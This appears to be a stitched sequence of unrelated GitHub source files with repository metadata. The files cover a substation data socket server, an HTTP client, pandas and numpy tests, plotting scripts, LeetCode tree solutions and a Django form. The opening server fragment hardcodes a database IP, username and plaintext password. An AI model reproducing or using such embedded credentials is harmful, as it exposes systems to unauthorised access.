        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s1:
            s1.bind(('', PORT1))
            s1.listen()
            conn1, addr = s1.accept()
            with conn1:
                print('Server Substation 5 from:', addr)
                conn = psycopg2.connect(host="131.180.165.7", database="CRoF",
                                        user="postgres", password="crpg")
                cursor = conn.cursor()
                # Snapshot starting values and codes; only changes are sent.
                values = {i: _fetch(cursor, "value", i) for i, _ in _ID_PREFIXES}
                codes = {i: _fetch(cursor, "code", i) for i, _ in _ID_PREFIXES}
                while True:
                    try:
                        for obj_id, prefix in _ID_PREFIXES:
                            value = _fetch(cursor, "value", obj_id)
                            if values[obj_id] != value:
                                print(value)
                                message = prefix + "_" + str(codes[obj_id]) + "+" + str(value)
                                conn1.sendall(message.encode())
                                print(message)
                                values[obj_id] = value
                        conn1.sendall("a".encode())  # keep-alive byte
                        time.sleep(1)
                    except Exception:
                        # Client gone or query failed: end this session.
                        conn1.close()
                        conn.close()
                        print("Connection Close Substation 5")
                        break
            print("Restart Server Substation 6")
            conn.close()
            s1.close()
        time.sleep(1)
serverX()
|
[
"noreply@github.com"
] |
netlabcode.noreply@github.com
|
9953913a4f3c4ad0d5c3c64721526baac7fcac32
|
0f0530b06a59fe6cfaa74b0030d892256e33c666
|
/aioworkers/net/web/client.py
|
2734c1f7df6ac6cc16ae2630104baf89ad73f93e
|
[
"Apache-2.0"
] |
permissive
|
nicoddemus/aioworkers
|
c269b470be5be0c2a59fb2a91d3a285f54125735
|
4ab85064844dc28141833d1348989d8c891f3d7d
|
refs/heads/master
| 2022-12-06T21:22:29.976784
| 2020-08-22T11:42:53
| 2020-08-22T11:43:24
| 291,555,920
| 0
| 0
|
Apache-2.0
| 2020-08-30T21:37:29
| 2020-08-30T21:37:28
| null |
UTF-8
|
Python
| false
| false
| 3,021
|
py
|
import logging
import urllib.error
import urllib.request
from http.client import HTTPResponse
from typing import Any, Awaitable, Callable, Mapping, Optional, Tuple, Union
from aioworkers.core.base import ExecutorEntity
from aioworkers.http import URL
logger = logging.getLogger(__name__)
class Request:
    """Async context manager wrapping a lazily-executed urllib request."""

    def __init__(self, session: 'Session', *args, **kwargs):
        self._session = session
        self._request = urllib.request.Request(*args, **kwargs)
        self._response = None  # type: Optional[Response]

    async def __aenter__(self) -> 'Response':
        logger.info('Request %r', self._request)
        try:
            raw = await self._session.run(
                self._session.opener.open, self._request,
            )
        except urllib.error.HTTPError as e:
            # An HTTPError carries the response body/headers, so it is
            # exposed to the caller as a regular response.
            raw = e
        logger.info('Response %r', raw)
        self._response = Response(raw, self._session)
        return self._response

    async def __aexit__(self, exc_type, exc_val, exc_tb):
        await self._response.close()
class Response:
    """Async facade over a blocking urllib/http.client response.

    Blocking calls (read/close) are dispatched through the owning
    session's executor runner.
    """

    def __init__(
        self, response: HTTPResponse,
        session: 'Session',
    ):
        self._response = response
        self._session = session

    @property
    def status(self):
        # HTTP status code of the underlying response.
        return self._response.status

    @property
    def reason(self):
        # HTTP reason phrase of the underlying response.
        return self._response.reason

    @property
    def headers(self):
        return self._response.headers

    async def read(self) -> bytes:
        """Read the full body without blocking the event loop."""
        return await self._session.run(self._response.read)

    def isclosed(self):
        return self._response.isclosed()

    async def close(self):
        return await self._session.run(self._response.close)
class Session:
    """HTTP session built on urllib, driven through an executor runner.

    ``runner`` is an awaitable-returning callable (typically
    ``run_in_executor``) used to off-load the blocking urllib calls.
    """

    def __init__(
        self,
        runner: Callable[..., Awaitable[Any]],
        headers: Mapping = None,
        conn_timeout: float = 60,
        read_timeout: float = 60,
        handlers: Optional[Tuple[urllib.request.BaseHandler]] = None,
    ):
        self.run = runner
        self._headers = headers
        self._conn_timeout = conn_timeout
        self._read_timeout = read_timeout
        if handlers is None:
            # Default to cookie handling only.
            handlers = (urllib.request.HTTPCookieProcessor(),)
        self.opener = urllib.request.build_opener(*handlers)
        if headers:
            # Accept either a mapping or an iterable of (name, value) pairs.
            items = headers.items() if isinstance(headers, Mapping) else headers
            self.opener.addheaders = list(items)

    @classmethod
    def from_entity(cls, entity: ExecutorEntity, **kwargs) -> 'Session':
        """Build a session whose blocking calls run on the entity's executor."""
        kwargs.update(runner=entity.run_in_executor)
        return cls(**kwargs)

    def request(self, url: Union[str, URL], method='get', **kwargs) -> Request:
        """Create a lazily-executed Request bound to this session."""
        kwargs['url'] = str(url) if isinstance(url, URL) else url
        kwargs['method'] = method.upper()
        return Request(self, **kwargs)

    async def close(self):
        self.opener.close()
|
[
"yttrium@somedev.ru"
] |
yttrium@somedev.ru
|
c38a71aa6745843566b5e5e68584da67b3d9b12f
|
1ba8794a7e38c19fda1cf3a02a4e55004a4f99ec
|
/pandas/tests/scalar/test_na_scalar.py
|
e68e49814245f91df964719c373d4f4943563f87
|
[
"BSD-3-Clause"
] |
permissive
|
souravs17031999/pandas
|
51003c705c12f2f78d6c264c4333aabf5da7d312
|
8cdbebd6be92d317e0d21679c5891a10dbf8efe7
|
refs/heads/master
| 2020-09-24T13:46:40.314995
| 2019-12-04T05:40:28
| 2019-12-04T05:40:28
| 225,654,387
| 1
| 0
|
BSD-3-Clause
| 2019-12-04T03:13:02
| 2019-12-03T15:33:22
|
Python
|
UTF-8
|
Python
| false
| false
| 2,751
|
py
|
import numpy as np
import pytest
from pandas._libs.missing import NA
from pandas.core.dtypes.common import is_scalar
import pandas as pd
import pandas.util.testing as tm
def test_singleton():
    """NA is a singleton: re-instantiating its type yields the same object."""
    assert NA is NA
    assert type(NA)() is NA
def test_repr():
assert repr(NA) == "NA"
assert str(NA) == "NA"
def test_truthiness():
    """NA cannot be coerced to a bool: both bool() and `not` must raise."""
    # `not NA` goes through __bool__ as well, so exercise it directly.
    pytest.raises(TypeError, bool, NA)
    pytest.raises(TypeError, NA.__bool__)
def test_hashable():
    """NA hashes consistently and works as a dict key."""
    assert hash(NA) == hash(NA)
    mapping = {NA: "test"}
    assert mapping[NA] == "test"
def test_arithmetic_ops(all_arithmetic_functions):
op = all_arithmetic_functions
for other in [NA, 1, 1.0, "a", np.int64(1), np.nan]:
if op.__name__ == "rmod" and isinstance(other, str):
continue
if op.__name__ in ("divmod", "rdivmod"):
assert op(NA, other) is (NA, NA)
else:
assert op(NA, other) is NA
def test_comparison_ops():
    """Rich comparisons involving NA propagate NA, in either operand order."""
    candidates = [NA, 1, 1.0, "a", np.int64(1), np.nan]
    for other in candidates:
        outcomes = [NA == other, NA != other, NA > other,
                    NA >= other, NA < other, NA <= other]
        # Reflected comparisons against numpy scalars deprecation-warn and
        # return plain booleans (or raise), so only the forward direction is
        # exercised for np.int64.
        if not isinstance(other, np.int64):
            outcomes += [other == NA, other != NA, other > NA,
                         other >= NA, other < NA, other <= NA]
        for outcome in outcomes:
            assert outcome is NA
def test_unary_ops():
    """Unary +, -, abs() and ~ all propagate NA."""
    for result in (+NA, -NA, abs(NA), ~NA):
        assert result is NA
def test_logical_and():
    """Kleene ``&``: False dominates; True/NA combinations give NA."""
    cases = [
        (NA, True, NA),
        (True, NA, NA),
        (NA, False, False),
        (False, NA, False),
        (NA, NA, NA),
    ]
    for left, right, expected in cases:
        assert (left & right) is expected
    with pytest.raises(TypeError):
        NA & 5
def test_logical_or():
    """Kleene ``|``: True dominates; False/NA combinations give NA."""
    cases = [
        (NA, True, True),
        (True, NA, True),
        (NA, False, NA),
        (False, NA, NA),
        (NA, NA, NA),
    ]
    for left, right, expected in cases:
        assert (left | right) is expected
    with pytest.raises(TypeError):
        NA | 5
def test_logical_xor():
    """Kleene ``^``: any NA operand makes the result NA."""
    cases = [
        (NA, True, NA),
        (True, NA, NA),
        (NA, False, NA),
        (False, NA, NA),
        (NA, NA, NA),
    ]
    for left, right, expected in cases:
        assert (left ^ right) is expected
    with pytest.raises(TypeError):
        NA ^ 5
def test_logical_not():
    """Logical inversion of NA is still NA (Kleene ``not``)."""
    result = ~NA
    assert result is NA
def test_is_scalar():
    """pandas classifies NA as a scalar value."""
    result = is_scalar(NA)
    assert result is True
def test_isna():
    """pd.isna / pd.notna recognise NA as a missing value."""
    for checker, expected in ((pd.isna, True), (pd.notna, False)):
        assert checker(NA) is expected
def test_series_isna():
    """Series.isna flags NA entries in an object-dtype Series."""
    ser = pd.Series([1, NA], dtype=object)
    expected_mask = pd.Series([False, True])
    tm.assert_series_equal(ser.isna(), expected_mask)
|
[
"jeff@reback.net"
] |
jeff@reback.net
|
d933617badf4c3b39e324ad69a7ee50c2c10378b
|
5496b9682dec06925f3572e64d7f1eb48d78ebe1
|
/src/advection_scenarios/create_grid_spacing.py
|
ab9a14e171f5c9db216a14e05f9a775bf97de885
|
[] |
no_license
|
VictorOnink/Lagrangian-Transport-Scenarios
|
64bec8b992e2909a05b0258524dbae25f967ea29
|
586bcecc42d6a7f4f299507da8f0cb29c8d71a2e
|
refs/heads/master
| 2023-04-14T12:22:29.309172
| 2022-07-11T18:46:38
| 2022-07-11T18:46:38
| 297,894,637
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,595
|
py
|
import settings
import utils
import numpy as np
import xarray
import progressbar
def create_grid_spacing(output_name: str, grid: np.array, lon: np.array, lat: np.array):
    """Compute per-cell longitude/latitude spacing for ``grid`` and save to NetCDF.

    The spacing of cell (i, j) is the absolute difference to the next grid
    point along that axis; the last row/column are then padded by duplicating
    their neighbours (see fill_last). Fields are written with a dummy
    single-entry time axis so they align with the model data files.

    :param output_name: path of the NetCDF file to create
    :param grid: 2D array whose shape defines the (lat, lon) grid
    :param lon: 1D longitudes; assumed length == grid.shape[1] — TODO confirm
    :param lat: 1D latitudes; assumed length == grid.shape[0] — TODO confirm
    """
    # Vectorized replacement of the original O(rows*cols) Python double loop:
    # the spacing depends only on the 1D coordinate arrays, so compute the
    # absolute differences once and broadcast them over the interior cells.
    grid_lon_spacing = np.zeros(grid.shape)
    grid_lat_spacing = np.zeros(grid.shape)
    grid_lon_spacing[:-1, :-1] = np.abs(np.diff(lon))[np.newaxis, :]
    grid_lat_spacing[:-1, :-1] = np.abs(np.diff(lat))[:, np.newaxis]
    grid_lon_spacing = fill_last(grid_lon_spacing)
    grid_lat_spacing = fill_last(grid_lat_spacing)
    # Saving the entire grid spacing fields
    coords = [('time', np.array([0])), ('lat', lat), ('lon', lon)]
    lon_space = xarray.DataArray(grid_lon_spacing[np.newaxis, :, :], coords=coords)
    lat_space = xarray.DataArray(grid_lat_spacing[np.newaxis, :, :], coords=coords)
    dcoo = {'time': np.array([0]), 'lat': lat, 'lon': lon}
    dset = xarray.Dataset({'lon_spacing': lon_space, 'lat_spacing': lat_space}, coords=dcoo)
    dset.to_netcdf(output_name)
    # Sanity check: report the spacing extremes so bad coordinate input shows up.
    utils.print_statement("The maximum lon spacing is {}, and the minimum is {}".format(grid_lon_spacing.max(), grid_lon_spacing.min()))
    utils.print_statement("The maximum lat spacing is {}, and the minimum is {}".format(grid_lat_spacing.max(), grid_lat_spacing.min()))
def fill_last(array: np.array):
    """Pad the array edges in place: last column copies the previous column,
    then the last row copies the previous row (so the corner ends up equal to
    array[-2, -2]). Returns the same array for chaining."""
    np.copyto(array[:, -1], array[:, -2])
    np.copyto(array[-1, :], array[-2, :])
    return array
|
[
"31734765+VictorOnink@users.noreply.github.com"
] |
31734765+VictorOnink@users.noreply.github.com
|
8475480405ab57c758c966b738b679c6d1f6aef0
|
b9e99a828952ffeab9767e625c0061cb3ea5b670
|
/Python编程从入门到实践/data_visual/csv_test/highs_lows.py
|
2d91031ecfd543481f909f68a6c6648d8d98b679
|
[] |
no_license
|
ZGA101421/Python3_Project
|
95d95e23858ef92f6825f018605089c105303ad3
|
fa30f876fd13890743bc81d1521534c340575132
|
refs/heads/master
| 2022-04-03T07:03:46.369710
| 2019-12-30T15:22:21
| 2019-12-30T15:22:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,117
|
py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File    :   highs_lows.py
@Time    :   2019/04/06 22:32:59
@Author  :   leacoder
@Version :   1.0
@Contact :   leacock1991@gmail.com
@License :
@Desc    :   Read daily weather records from a CSV file and plot the daily
             high/low temperature curves with matplotlib.
'''
# Imports
# The csv module is part of the Python standard library.
import csv
from matplotlib import pyplot as plt
# The datetime module handles date parsing.
from datetime import datetime
# Extract the dates, daily highs and daily lows from the file.
filename = 'death_valley_2014.csv'
with open(filename) as f:
    # Create a reader object associated with the open file.
    reader = csv.reader(f)
    # csv.next() returns the next row each time it is called; calling it once
    # here consumes (and discards) the header row of column names.
    header_row = next(reader)
    dates, highs, lows = [], [], []
    for row in reader:  # iterate over the remaining data rows
        try:  # guard against missing/malformed values in a row
            current_date = datetime.strptime(row[0], "%Y-%m-%d")  # e.g. '2014-7-1'
            high = int(row[1])
            low = int(row[3])
        except ValueError:
            # NOTE(review): if the very first row's date fails to parse,
            # current_date is unbound here and this print raises NameError.
            print(current_date, 'missing data')
        else:
            dates.append(current_date)
            highs.append(high)
            lows.append(low)
# Plot the data.
fig = plt.figure(dpi=123, figsize=(10, 6))
'''
plot(*args[, scalex, scaley, data])
Plot y versus x as lines and/or markers.
alpha: float  Set the alpha value used for blending - not supported on all backends.
'''
plt.plot(dates, highs, c='red', alpha=0.5)  # daily highs
plt.plot(dates, lows, c='blue', alpha=0.5)  # daily lows
'''
fill_between(x, y1[, y2, where, ...])
Fill the area between two horizontal curves.
'''
plt.fill_between(dates, highs, lows, facecolor='blue', alpha=0.1)
# Format the plot.
# NOTE(review): this title is overwritten by the second plt.title call below.
plt.title("Daily high temperatures - 2014", fontsize=24)
plt.xlabel('', fontsize=16)
'''
autofmt_xdate(self, bottom=0.2, rotation=30, ha='right', which=None)
Date ticklabels often overlap, so it is useful to rotate them and right align them.
bottom : scalar
    The bottom of the subplots for subplots_adjust().
rotation : angle in degrees
    The rotation of the xtick labels.
ha : string
    The horizontal alignment of the xticklabels.
which : {None, 'major', 'minor', 'both'}
    Selects which ticklabels to rotate. Default is None which works the same as major.
'''
fig.autofmt_xdate()
title = "Daily high and low temperatures - 2014\nDeath Valley, CA"
plt.title(title, fontsize=24)
'''
tick_params([axis])
Change the appearance of ticks, tick labels, and gridlines.
axis : {'x', 'y', 'both'}, optional
    Which axis to apply the parameters to.
which : {'major', 'minor', 'both'}
    Default is 'major'; apply arguments to which ticks.
'''
plt.tick_params(axis='both', which='major', labelsize=16)
plt.show()
|
[
"986740304@qq.com"
] |
986740304@qq.com
|
5f939ea970bddbb00c0137ac68aa23127fa09de8
|
affe80fe068100199dcf64e16c305d1e2b8ca0bf
|
/official/modeling/progressive/train_lib_test.py
|
a64b6da3fd504b3c60317df44a150dc891cb416b
|
[
"Apache-2.0"
] |
permissive
|
farshbafdoustar/models
|
2c8c474e2e6f0bb38e1679282e8b64c39f58d3b1
|
3a2e407ce3871551b0074bcf10a0d6ee180bbdb2
|
refs/heads/master
| 2023-01-31T19:11:23.084582
| 2020-12-19T09:26:44
| 2020-12-19T09:26:44
| 322,809,980
| 0
| 0
|
Apache-2.0
| 2020-12-19T09:27:09
| 2020-12-19T09:22:00
|
Python
|
UTF-8
|
Python
| false
| false
| 5,807
|
py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the progressive train_lib."""
import os
from absl import flags
from absl.testing import parameterized
import dataclasses
import orbit
import tensorflow as tf
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import strategy_combinations
from official.common import flags as tfm_flags
# pylint: disable=unused-import
from official.common import registry_imports
# pylint: enable=unused-import
from official.core import config_definitions as cfg
from official.core import task_factory
from official.modeling import optimization
from official.modeling.hyperparams import params_dict
from official.modeling.progressive import policies
from official.modeling.progressive import train_lib
from official.modeling.progressive import trainer as prog_trainer_lib
from official.utils.testing import mock_task
FLAGS = flags.FLAGS
tfm_flags.define_flags()
@dataclasses.dataclass
class ProgTaskConfig(cfg.TaskConfig):
  """Task config registered for ProgMockTask below; adds no fields of its own."""
  pass
@task_factory.register_task_cls(ProgTaskConfig)
class ProgMockTask(policies.ProgressivePolicy, mock_task.MockTask):
  """Progressive task for testing."""
  def __init__(self, params: cfg.TaskConfig, logging_dir: str = None):
    # Initialize the mock task first; the progressive policy then pulls its
    # stage schedule from the overridden methods below.
    mock_task.MockTask.__init__(
        self, params=params, logging_dir=logging_dir)
    policies.ProgressivePolicy.__init__(self)
  def num_stages(self):
    """Two progressive stages are used in the tests."""
    return 2
  def num_steps(self, stage_id):
    """Train for 2 steps in stage 0 and 4 steps in stage 1."""
    return 2 if stage_id == 0 else 4
  def get_model(self, stage_id, old_model=None):
    """Builds a fresh model for every stage; previous weights are ignored."""
    del stage_id, old_model
    return self.build_model()
  def get_optimizer(self, stage_id):
    """Build optimizer for each stage."""
    # AdamW with a linear-decay schedule and a short polynomial warmup;
    # identical for every stage (stage_id is unused).
    params = optimization.OptimizationConfig({
        'optimizer': {
            'type': 'adamw',
        },
        'learning_rate': {
            'type': 'polynomial',
            'polynomial': {
                'initial_learning_rate': 0.01,
                'end_learning_rate': 0.0,
                'power': 1.0,
                'decay_steps': 10,
            },
        },
        'warmup': {
            'polynomial': {
                'power': 1,
                'warmup_steps': 2,
            },
            'type': 'polynomial',
        }
    })
    opt_factory = optimization.OptimizerFactory(params)
    optimizer = opt_factory.build_optimizer(opt_factory.build_learning_rate())
    return optimizer
  def get_train_dataset(self, stage_id):
    """Stage-independent distributed training dataset from the mock inputs."""
    del stage_id
    strategy = tf.distribute.get_strategy()
    return orbit.utils.make_distributed_dataset(
        strategy, self.build_inputs, None)
  def get_eval_dataset(self, stage_id):
    """Stage-independent distributed evaluation dataset from the mock inputs."""
    del stage_id
    strategy = tf.distribute.get_strategy()
    return orbit.utils.make_distributed_dataset(
        strategy, self.build_inputs, None)
class TrainTest(tf.test.TestCase, parameterized.TestCase):
  """End-to-end tests for progressive train_lib.run_experiment."""
  def setUp(self):
    super(TrainTest, self).setUp()
    # Minimal trainer overrides so each parameterized case finishes quickly.
    self._test_config = {
        'trainer': {
            'checkpoint_interval': 10,
            'steps_per_loop': 10,
            'summary_interval': 10,
            'train_steps': 10,
            'validation_steps': 5,
            'validation_interval': 10,
            'continuous_eval_timeout': 1,
            'optimizer_config': {
                'optimizer': {
                    'type': 'sgd',
                },
                'learning_rate': {
                    'type': 'constant'
                }
            }
        },
    }
  @combinations.generate(
      combinations.combine(
          distribution_strategy=[
              strategy_combinations.default_strategy,
              strategy_combinations.cloud_tpu_strategy,
              strategy_combinations.one_device_strategy_gpu,
          ],
          mode='eager',
          flag_mode=['train', 'eval', 'train_and_eval'],
          run_post_eval=[True, False]))
  def test_end_to_end(self, distribution_strategy, flag_mode, run_post_eval):
    """Runs a full experiment per strategy/mode and checks outputs exist."""
    model_dir = self.get_temp_dir()
    experiment_config = cfg.ExperimentConfig(
        trainer=prog_trainer_lib.ProgressiveTrainerConfig(),
        task=ProgTaskConfig())
    experiment_config = params_dict.override_params_dict(
        experiment_config, self._test_config, is_strict=False)
    with distribution_strategy.scope():
      task = task_factory.get_task(experiment_config.task,
                                   logging_dir=model_dir)
    _, logs = train_lib.run_experiment(
        distribution_strategy=distribution_strategy,
        task=task,
        mode=flag_mode,
        params=experiment_config,
        model_dir=model_dir,
        run_post_eval=run_post_eval)
    # Post-eval logs are only produced when requested.
    if run_post_eval:
      self.assertNotEmpty(logs)
    else:
      self.assertEmpty(logs)
    if flag_mode == 'eval':
      return
    # Any training mode must have produced at least one checkpoint.
    self.assertNotEmpty(
        tf.io.gfile.glob(os.path.join(model_dir, 'checkpoint')))
    # Tests continuous evaluation.
    _, logs = train_lib.run_experiment(
        distribution_strategy=distribution_strategy,
        task=task,
        mode='continuous_eval',
        params=experiment_config,
        model_dir=model_dir,
        run_post_eval=run_post_eval)
    print(logs)
# Run the test suite when executed directly.
if __name__ == '__main__':
  tf.test.main()
|
[
"gardener@tensorflow.org"
] |
gardener@tensorflow.org
|
d90e9983e678c614e1ad4d95be16bb3c39cb1ccb
|
6ccb55befcbc69caa351b8337fdd40e55dbb802f
|
/venv/bin/update-tld-names
|
f14760f6fbf606e71bb165ba44b46f3f3723847d
|
[] |
no_license
|
FiacreT/M-moire
|
cc0791cbf98bf565ea637e6ec409611bcc596c57
|
4089755191ffc848614247e98bbb641c1933450d
|
refs/heads/master
| 2022-12-12T21:55:23.679854
| 2019-09-06T23:28:03
| 2019-09-06T23:28:03
| 187,702,532
| 2
| 2
| null | 2022-12-08T01:04:58
| 2019-05-20T19:39:21
|
Python
|
UTF-8
|
Python
| false
| false
| 192
|
#!/home/fiacre/Python-Project/datasploit-master/venv/bin/python2
# We should have absolute imports here
from tld.commands.update_tld_names import main
if __name__ == "__main__":
    # Delegate to tld's CLI entry point to refresh the cached TLD names file.
    main()
|
[
"hervesoubgui57@gmail.com"
] |
hervesoubgui57@gmail.com
|
|
c8d425241dc48565765bc90cd2afed9745c89bb4
|
ddb185b0cf581d85a1dd733a6d1e5d027ba3e0ca
|
/phase1/993.py
|
9933eaf67c3581eb880d47702addd2ff933ea70c
|
[] |
no_license
|
GavinPHR/code
|
8a319e1223a307e755211b7e9b34c5abb00b556b
|
b1d8d49633db362bbab246c0cd4bd28305964b57
|
refs/heads/master
| 2020-05-16T04:09:19.026207
| 2020-04-30T10:00:06
| 2020-04-30T10:00:06
| 182,766,600
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 937
|
py
|
# Cousins in Binary Tree
from binarytree import TreeNode, makeTree
import collections
class Solution:
    """LeetCode 993 — Cousins in Binary Tree.

    Two nodes are cousins when they are at the same depth but have
    different parents. Assumes node values are unique, per the problem.
    """

    def isCousins(self, root: "TreeNode", x: int, y: int) -> bool:
        """Return True iff the nodes holding x and y are cousins.

        Bug fix: the original indexed the search result without checking
        for None, so a value absent from the tree raised TypeError; now
        such lookups simply return False.
        """
        if root is None or root.val in (x, y):
            # The root has no parent, so it can never be a cousin.
            return False

        def locate(node, val, depth):
            # Return (depth, parent_val) for the child holding `val`,
            # or None when `val` is not in this subtree.
            if not node:
                return None
            for child in (node.left, node.right):
                if child and child.val == val:
                    return (depth + 1, node.val)
            return (locate(node.left, val, depth + 1)
                    or locate(node.right, val, depth + 1))

        a = locate(root, x, 0)
        b = locate(root, y, 0)
        if a is None or b is None:
            return False
        # Same depth, different parents.
        return a[0] == b[0] and a[1] != b[1]
if __name__ == '__main__':
    # Tree [1,2,3,None,4,None,5]: 4 and 5 are both on level 2 under
    # different parents, so the expected output is True.
    root = makeTree([1,2,3,None,4,None,5])
    s = Solution()
    print(s.isCousins(root, 4, 5))
|
[
"gavinsweden@gmail.com"
] |
gavinsweden@gmail.com
|
ff7d9e4d8bf6c338b93d2ca521b0c02ba9e27b95
|
109d501eeb83981c058bf1e01f10c7851f3866b5
|
/people/forms.py
|
22d0e3360774fbe291e21dbe27ebd94aaac1f2fb
|
[] |
no_license
|
alikhundmiri/revenue_source_directory
|
028f8164d7a6a5d62f24b1a0214664718c866291
|
636311269557352d901e47f847b044dc2a7545dc
|
refs/heads/master
| 2022-12-16T20:51:44.327649
| 2018-09-24T13:50:17
| 2018-09-24T13:50:17
| 137,063,499
| 0
| 0
| null | 2022-12-08T02:14:33
| 2018-06-12T11:43:40
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,237
|
py
|
from django import forms
from django.core.validators import validate_email
from .models import contact_details
# Form for accepting new interviews
class InterviewRequestForm(forms.ModelForm):
    """Form accepting new interview requests: a contact platform plus handle."""

    class Meta:
        model = contact_details
        fields = [
            'contact_form',
            'contact',
        ]

    def clean_contact(self):
        """Validate the contact value and reject duplicate submissions."""
        contact = self.cleaned_data.get('contact')
        platform = self.cleaned_data.get('contact_form')
        # Email handles get a proper address check; other platforms are free-form.
        if platform == 'email':
            try:
                validate_email(contact)
            except forms.ValidationError:
                raise forms.ValidationError("Please enter a Valid Email address")
        duplicates = contact_details.objects.filter(contact=contact, contact_form=platform)
        if duplicates:
            raise forms.ValidationError("You already submitted a request with these credentials")
        return contact

    def __init__(self, *args, **kwargs):
        super(InterviewRequestForm, self).__init__(*args, **kwargs)
        # Friendlier labels/help texts than the model defaults.
        self.fields["contact_form"].help_text = "Select a social media to get in contact with you, example: Twitter, or an email"
        self.fields["contact"].help_text = "Enter your User ID or e-mail"
        self.fields["contact"].label = "User ID"
        self.fields["contact_form"].label = "Platform"
|
[
"salikhundmiri@gmail.com"
] |
salikhundmiri@gmail.com
|
915041a61b6a71d83948b1377ec6af9eacdb1a07
|
89213af925471c5954a12d0fe5bb47dfd988c351
|
/tree/0199_right_side_view_BT.py
|
b9c870d5a7eb7f463f9325d660bcbb7aa25e8deb
|
[] |
no_license
|
seanchen513/leetcode
|
be554dd668221b6d03c598090d6684165bc512c5
|
4723a64b00502c824bb9b848a1737478096aa3e1
|
refs/heads/master
| 2021-11-10T11:50:16.674255
| 2021-11-10T02:57:02
| 2021-11-10T02:57:02
| 237,393,266
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,972
|
py
|
"""
199. Binary Tree Right Side View
Medium
Given a binary tree, imagine yourself standing on the right side of it, return the values of the nodes you can see ordered from top to bottom.
Example:
Input: [1,2,3,null,5,null,4]
Output: [1, 3, 4]
Explanation:
1 <---
/ \
2 3 <---
\ \
5 4 <---
"""
#import sys
#sys.path.insert(1, '../tree/')
from binary_tree import TreeNode, print_tree, array_to_bt_lc
from typing import List
###############################################################################
"""
Solution 1: BFS and take last element of each level.
O(n) time
O(n) extra space (due to last level)
O(h) space for output
"""
class Solution:
    """Right side view via breadth-first (level-order) traversal."""

    def rightSideView(self, root: TreeNode) -> List[int]:
        """Return the value of the rightmost node on each level, top down."""
        result = []
        frontier = [root] if root else []
        while frontier:
            # The last node in the level list is the rightmost one.
            result.append(frontier[-1].val)
            frontier = [child
                        for node in frontier
                        for child in (node.left, node.right)
                        if child]
        return result
###############################################################################
"""
Solution 2: modified postorder traversal (LRP, left-right-parent).
For each level, the rightmost element is visited first.
O(n) time
O(h) space for recursion stack
O(h) space for dict and output
"""
class Solution2:
    """Right side view via right-first depth-first traversal.

    Because the right subtree is fully explored before the left, the first
    value recorded at each depth is the rightmost node of that level.
    """

    def rightSideView(self, root: TreeNode) -> List[int]:
        """Return the rightmost value per level (first-seen wins per depth)."""
        first_seen = {}

        def visit(node, depth=0):
            if node is None:
                return
            visit(node.right, depth + 1)
            visit(node.left, depth + 1)
            # setdefault keeps the earlier (rightmost) value for this depth.
            first_seen.setdefault(depth, node.val)

        visit(root)
        return [first_seen[d] for d in range(len(first_seen))]
###############################################################################
if __name__ == "__main__":
    def test(arr, comment=None):
        # Build the tree from a LeetCode-style level-order array and run
        # every solution class against it, printing tree and results.
        root = array_to_bt_lc(arr)
        solutions = [Solution(), Solution2()]
        res = [s.rightSideView(root) for s in solutions]
        print("="*80)
        if comment:
            print(comment, "\n")
        print(arr, "\n")
        print_tree(root)
        print(f"\nSolutions: {res}")
    comment = "Tree w/ depth 1"
    arr = [1]
    test(arr, comment)
    comment = "Tree w/ depth 2"
    arr = [1, 2,3]
    test(arr, comment)
    comment = "Tree w/ depth 3"
    arr = [1, 2,3, 4,5,6,7]
    test(arr, comment)
    comment = ""
    arr = [1,None,3,None,7]
    test(arr, comment)
    comment = ""
    arr = [1,2,None,4]
    test(arr, comment)
    comment = ""
    arr = [1, 2,3, 4,None,None,7, 8,None,None,15]
    test(arr, comment)
    comment = "LC example 1; answer = [1, 3, 4]"
    arr = [1, 2,3, None,5,None,4]
    test(arr, comment)
|
[
"seanchen513@gmail.com"
] |
seanchen513@gmail.com
|
d8c4edc6e935f0f2cb02543ebdf08f69695c523c
|
d77a0d5a18af141d36005eba1769f7384f5ce1d4
|
/mDataAn_venv/Lib/site-packages/numpy/testing/tests/test_decorators.py
|
69c1c9ad4a3558ad02edf36dd0e0855c6e0df6d9
|
[] |
no_license
|
LukasPolon/MData
|
32d756d0df8c8847cf45b8def6e5ef760963d895
|
2178a0b2f60c4c638fd696a6e11b0ef801724bf4
|
refs/heads/master
| 2022-12-11T15:02:07.528855
| 2018-01-07T16:22:58
| 2018-01-07T16:22:58
| 99,687,079
| 1
| 0
| null | 2021-06-01T22:04:39
| 2017-08-08T11:51:11
|
Python
|
UTF-8
|
Python
| false
| false
| 4,493
|
py
|
from __future__ import division, absolute_import, print_function
import warnings
from numpy.testing import (dec, assert_, assert_raises, run_module_suite,
SkipTest, KnownFailureException)
def test_slow():
    """dec.slow tags the decorated function with a truthy ``slow`` attribute."""
    @dec.slow
    def marked(a, b, c):
        pass
    assert_(marked.slow)
def test_setastest():
    """dec.setastest drives the __test__ flag: default/True set it, False clears it."""
    @dec.setastest()
    def default_case(a):
        pass

    @dec.setastest(True)
    def explicit_true(a):
        pass

    @dec.setastest(False)
    def explicit_false(a):
        pass

    assert_(default_case.__test__)
    assert_(explicit_true.__test__)
    assert_(not explicit_false.__test__)
class DidntSkipException(Exception):
    """Raised by test bodies below to signal that a decorator failed to skip them."""
    pass
def test_skip_functions_hardcoded():
    """skipif(True) raises SkipTest before the body runs; skipif(False) runs it."""
    @dec.skipif(True)
    def always_skipped(arg):
        raise DidntSkipException

    try:
        always_skipped('a')
    except DidntSkipException:
        raise Exception('Failed to skip')
    except SkipTest:
        pass

    @dec.skipif(False)
    def never_skipped(arg):
        raise DidntSkipException

    try:
        never_skipped('a')
    except DidntSkipException:
